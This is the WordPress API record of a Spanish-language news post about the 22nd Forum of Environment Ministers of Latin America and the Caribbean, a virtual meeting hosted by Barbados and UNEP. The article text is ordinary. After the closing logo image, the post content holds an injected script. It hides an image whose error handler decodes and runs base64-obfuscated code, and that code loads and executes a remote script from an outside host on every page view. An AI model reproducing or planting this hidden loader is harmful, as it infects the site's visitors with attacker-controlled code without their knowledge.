{"id":4244,"date":"2021-02-03T10:33:19","date_gmt":"2021-02-03T13:33:19","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=4244"},"modified":"2025-08-13T16:34:30","modified_gmt":"2025-08-13T19:34:30","slug":"xxii-foro-de-ministros-de-medio-ambiente-de-america-latina-y-el-caribe","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=4244","title":{"rendered":"XXII Foro de Ministros de Medio Ambiente de Am\u00e9rica Latina y el Caribe"},"content":{"rendered":"\n<p><strong><em>Con el fin de abordar los desaf\u00edos m\u00e1s apremiantes de la regi\u00f3n, oportunidades para la recuperaci\u00f3n sostenible y acciones urgentes en favor de la naturaleza<\/em><\/strong><\/p>\n\n\n\n<p>En el contexto de la pandemia de COVID-19 y las restricciones vigentes para evitar una mayor transmisi\u00f3n de la enfermedad, el encuentro regional se celebrar\u00e1 por primera vez en un formato virtual. La reuni\u00f3n es organizada por el Gobierno de Barbados, actual presidente del foro, y la Oficina Regional para Am\u00e9rica Latina y el Caribe del Programa de las Naciones Unidas para el Medio Ambiente (PNUMA).<\/p>\n\n\n\n<p>\u00abEsta pandemia ha demostrado que el equilibrio de nuestros ecosistemas se ve afectado por la forma en que usamos nuestros recursos naturales. A\u00fan estamos a tiempo de construir un futuro sostenible para Am\u00e9rica Latina y el Caribe, y hago un llamado a los ministros de la regi\u00f3n para que apoyen los compromisos audaces que necesitamos para garantizar precisamente eso\u00bb, dijo el ministro de Medio Ambiente y Embellecimiento Nacional de Barbados, Adrian Forde.<\/p>\n\n\n\n<p>Los ministros debatir\u00e1n temas urgentes para la regi\u00f3n, incluida la transici\u00f3n hacia una econom\u00eda circular, la agenda sobre el cierre de vertederos a cielo abierto, la contaminaci\u00f3n del aire, la acci\u00f3n clim\u00e1tica, la justicia ambiental y la gobernanza, los v\u00ednculos entre g\u00e9nero y medio ambiente, el desarrollo sostenible de los peque\u00f1os Estados insulares en desarrollo y la importancia de reconstruir mejor y de manera m\u00e1s sostenible a ra\u00edz de la pandemia de COVID-19.<\/p>\n\n\n\n<p>La XXII Reuni\u00f3n del Foro tambi\u00e9n considerar\u00e1 la reestructuraci\u00f3n del Comit\u00e9 T\u00e9cnico Interagencial y un plan de acci\u00f3n de Am\u00e9rica Latina y el Caribe para la implementaci\u00f3n de la D\u00e9cada de las Naciones Unidas sobre la Restauraci\u00f3n de los Ecosistemas como dimensiones integrales de la recuperaci\u00f3n verde pos-COVID-19.<\/p>\n\n\n\n<p>\u201cEl mundo se enfrenta a un momento decisivo. Mientras pa\u00edses de todo el mundo preparan sus planes de recuperaci\u00f3n, entramos en una d\u00e9cada crucial en la que debemos dar un impulso final para lograr los Objetivos de Desarrollo Sostenible, el Acuerdo de Par\u00eds y un marco de biodiversidad nuevo y ambicioso\u201d, dijo el director regional del PNUMA en Am\u00e9rica Latina y el Caribe, Leo Heileman.<\/p>\n\n\n\n<p>\u201cConf\u00edo en que este encuentro regional ser\u00e1 un paso adelante en el camino hacia un futuro m\u00e1s pr\u00f3spero y sostenible\u201d, a\u00f1adi\u00f3 Heileman.<\/p>\n\n\n\n<p>El Foro de Ministros tambi\u00e9n preparar\u00e1 las contribuciones de la regi\u00f3n al quinto per\u00edodo de sesiones de la&nbsp;Asamblea de las Naciones Unidas para el Medio Ambiente, que tendr\u00e1 lugar en 2021. La Asamblea, el m\u00e1ximo \u00f3rgano ambiental de toma de decisiones ambientales, se reunir\u00e1 bajo el tema \u201cFortalecer la acci\u00f3n por la naturaleza para lograr los Objetivos de Desarrollo Sostenible\u201d.<\/p>\n\n\n\n<p>El Foro de Ministros de Medio Ambiente de Am\u00e9rica Latina y el Caribe se estableci\u00f3 en 1982 y es el organismo de cooperaci\u00f3n m\u00e1s antiguo y relevante para las autoridades ambientales de la regi\u00f3n.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/02\/travel2latam.logo_.gif\" target=\"_blank\" rel=\"noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/02\/travel2latam.logo_.gif\" alt=\"\" class=\"wp-image-4245\" width=\"100\" height=\"38\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Con el fin de abordar los desaf\u00edos m\u00e1s apremiantes de la regi\u00f3n, oportunidades para la recuperaci\u00f3n sostenible y acciones urgentes en favor de la naturaleza En el contexto de la pandemia de COVID-19 y las restricciones vigentes para evitar una mayor transmisi\u00f3n de la enfermedad, el encuentro regional se celebrar\u00e1 por primera vez en un [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":4246,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[29],"tags":[],"class_list":["post-4244","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-datos-utiles"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4244","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4244"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4244\/revisions"}],"predecessor-version":[{"id":10867,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4244\/revisions\/10867"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4246"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4244"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4244"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4244"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}